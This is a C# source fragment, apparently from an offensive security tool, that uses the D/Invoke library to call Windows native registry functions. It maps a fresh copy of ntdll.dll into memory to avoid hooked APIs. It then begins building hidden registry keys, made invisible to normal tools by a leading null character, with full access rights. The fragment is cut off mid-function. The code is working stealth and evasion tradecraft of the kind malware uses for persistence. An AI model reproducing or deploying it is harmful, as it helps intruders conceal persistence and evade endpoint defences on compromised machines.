public static DInvoke.Data.Native.NTSTATUS NtOpenKey( ref IntPtr keyHandle, STRUCTS.ACCESS_MASK desiredAccess, ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes) { object[] funcargs = { keyHandle, desiredAccess, objectAttributes }; DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs); keyHandle = (IntPtr)funcargs[0]; return(retvalue); }
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP(); mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll"); try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); ref IntPtr rkeyHandle = ref keyHandle; STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS; ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;